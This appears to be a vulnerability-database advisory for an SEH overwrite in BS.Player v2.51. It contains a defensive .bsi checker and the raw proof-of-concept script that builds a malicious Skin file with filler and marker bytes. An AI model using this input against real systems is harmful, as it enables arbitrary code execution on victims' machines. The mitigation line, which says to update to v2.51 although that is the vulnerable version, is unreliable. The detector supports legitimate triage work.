Vendor: BS.Player
By: Mert Sarica
CVSS: 9,3 (HIGH)
SEH Overwrite Vulnerability
CWE: 119
Product Name: BS.Player
Affected Version From: v2.51
Affected Version To: v2.51
Patch Exists: YES
Related CWE: N/A
CPE: a:bsplayer:bs.player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

BS.Player v2.51

A SEH overwrite vulnerability exists in BS.Player v2.51. An attacker can exploit this vulnerability by creating a malicious .bsi file containing a specially crafted Skin option with a large number of 'A' characters followed by four 'B' characters and four 'C' characters. When the file is opened, the SEH handler will be overwritten with the 'C' characters, allowing the attacker to execute arbitrary code.

Mitigation:

Users should update to the latest version of BS.Player v2.51 to mitigate this vulnerability.
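For triage of .bsi files before they reach the player, the check below flags an [Options] Skin value of the kind described above. It is an added example, not code from the advisory or from BS.Player; the 260-byte limit (Windows MAX_PATH), the case-insensitive INI matching and the sample skin path are assumptions.

```python
# Added example: flag .bsi files whose [Options] Skin value looks abusive.
MAX_SKIN_LEN = 260  # assumption: Windows MAX_PATH, not a documented BS.Player limit


def check_bsi(data, max_len=MAX_SKIN_LEN):
    """Return (line_number, message) findings for the raw bytes of a .bsi file."""
    findings = []
    section = None
    for lineno, raw in enumerate(data.splitlines(), 1):
        line = raw.strip()
        if line.startswith(b"[") and line.endswith(b"]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition(b"=")
        # Assumption: section and key names match case-insensitively (INI style).
        if not sep or section != b"options" or key.strip().lower() != b"skin":
            continue
        value = value.strip()
        if len(value) > max_len:
            findings.append(
                (lineno, "Skin value is %d bytes (limit %d)" % (len(value), max_len))
            )
        if any(b < 0x20 or b == 0x7F for b in value):
            findings.append((lineno, "Skin value contains control bytes"))
    return findings


# Constructed samples: a short skin path, and the length pattern described above.
BENIGN = b"[Options]\r\nSkin=skins\\default.bsz\r\n"
OVERLONG = b"[Options]\nSkin=" + b"A" * 496 + b"B" * 4 + b"C" * 4

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(name, check_bsi(sample))
```

The file is read as bytes and parsed by hand so that a malformed or binary-laden file still yields findings instead of a parser exception.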

Exploit-DB raw data:

# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com

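junk = "[Options]\nSkin="

# 496 filler bytes ('A'), then four 'B' and four 'C' marker bytes;
# per the description above, the 'C' bytes overwrite the SEH handler.
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4

try:
    # The with-block closes the file even if the write fails.
    with open("vulnerable.bsi", "w") as vulnerable:
        vulnerable.write(vulnerability)
    print("Vulnerable file created!\n")
except IOError:
    print("Error occurred!")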